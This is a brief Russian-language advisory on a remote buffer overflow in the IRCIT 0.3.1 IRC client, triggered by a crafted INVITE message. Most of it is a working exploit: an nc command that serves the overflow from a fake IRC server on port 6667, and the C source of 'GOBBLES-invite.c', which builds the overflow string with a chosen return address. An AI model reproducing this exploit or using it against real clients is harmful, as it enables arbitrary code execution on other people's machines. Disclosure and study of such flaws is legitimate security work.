IRCIT — IRC клиент для Linux и UNIX систем. IRCIT содержит
пригодное для удаленного использования переполнение буфера. При получении INVITE сообщения, данные пользователя копируются в установленный буфер длины
MAXHOSTLEN. Отформатированное сообщение может переполнять этот буфер и выполнять произвольный код с правами IRCIT клиента.

Уязвимость обнаружена в Ayman Akt IRCIT 0.3.1 

Пример: $ echo «:x»‘!’`./GOBBLES-invite 0xcafebabe`»@x INVITE you :#GOBBLES» | nc — -l -p 6667 

Эксплоит:

/* GOBBLES-invite.c */

#include <stdio.h>

int
main(int argc, char **argv)
{
char heh[175], *store;
int i;

if(argc == 1) exit(0);

sscanf(argv[1], «%p», &store);
memset(heh, ‘x’, sizeof(heh));
*(long *)&heh[166] = (long)store;
*(long *)&heh[170] = (long)store;
heh[174] = ‘\0’;

fprintf(stdout, «%s», heh);
exit(0);
}

Оставить мнение